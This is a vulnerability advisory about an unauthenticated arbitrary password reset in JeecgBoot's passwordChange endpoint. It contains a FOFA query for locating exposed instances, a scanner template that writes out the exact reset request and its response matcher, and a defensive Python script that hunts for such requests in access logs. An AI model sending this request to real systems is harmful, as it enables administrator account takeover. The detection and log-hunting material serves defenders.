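Vulnerability Description
The passwordChange endpoint of the JeecgBoot framework has an arbitrary user password reset vulnerability. An unauthenticated remote attacker can exploit it to reset the administrator account's password and take over the system back end, leading to information disclosure and leaving the system in a highly insecure state.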
fofa: body="/sys/common/pdf/pdfPreviewIframe"
id: jeecgboot-passwordchange-user-reset-unauth

info:
  name: JeecgBoot 任意用户密码重置
  author: zan8in
  severity: high
  verified: true
  description: |-
    JeecgBoot框架passwordChange接口存在任意用户密码重置漏洞,未经身份验证的远程攻击者可以利用此漏洞重置管理员账户密码,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。
    fofa: body="/sys/common/pdf/pdfPreviewIframe"
  reference:
    - https://mp.weixin.qq.com/s/G5DiGrVbYKmftBLJ06NmQg
  tags: jeecgboot,unauth
  created: 2024/12/30

rules:
  r0:
    request:
      method: GET
      path: /novat-boot/sys/user/passwordChange?username=admin1&password=admin&smscode=&phone=
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"success":false') &&
      response.body.bcontains(b'"message":"未找到对应实体"') &&
      response.body.bcontains(b'"code":0') &&
      response.body.bcontains(b'"result":null') &&
      response.body.bcontains(b'"timestamp":')
expression: r0()
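
For defenders, the request shape in the rule above can be hunted for in web server access logs. The following is an added example, not part of the original PoC or of JeecgBoot: it assumes combined-log-format lines, and the sample log entries, IP addresses and the `/demo` context path are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: access logs are in combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Match on the suffix so any servlet context path (e.g. /novat-boot) is covered.
ENDPOINT_SUFFIX = "/sys/user/passwordChange"

def find_reset_attempts(lines):
    """Return one record per logged passwordChange request carrying credentials."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        url = urlsplit(m["target"])
        path = unquote(url.path).rstrip("/")  # normalise percent-encoding first
        if not path.endswith(ENDPOINT_SUFFIX):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        if "username" not in params or "password" not in params:
            continue
        hits.append({
            "ip": m["ip"],
            "time": m["ts"],
            "status": int(m["status"]),
            "username": params["username"][0],
            # An empty SMS code, as in the rule's request, deserves extra attention.
            "empty_smscode": params.get("smscode", [""])[0] == "",
            # The submitted password is deliberately not copied into the alert.
        })
    return hits

# Constructed sample log lines (documentation-range IPs).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Dec/2024:10:01:02 +0800] "GET /novat-boot/sys/user/passwordChange?username=admin1&password=admin&smscode=&phone= HTTP/1.1" 200 97',
    '198.51.100.4 - - [30/Dec/2024:10:01:05 +0800] "GET /novat-boot/sys/common/pdf/pdfPreviewIframe HTTP/1.1" 200 512',
    '203.0.113.7 - - [30/Dec/2024:10:02:11 +0800] "GET /demo/sys/user/passwordChange?username=admin&password=x&smscode=1234&phone=1 HTTP/1.1" 200 90',
    '198.51.100.9 - - [30/Dec/2024:10:03:00 +0800] "POST /novat-boot/sys/login HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for hit in find_reset_attempts(SAMPLE_LOG):
        print(hit)
```

Any hit from a client that never authenticated should be followed by a check of the named account's password-change history.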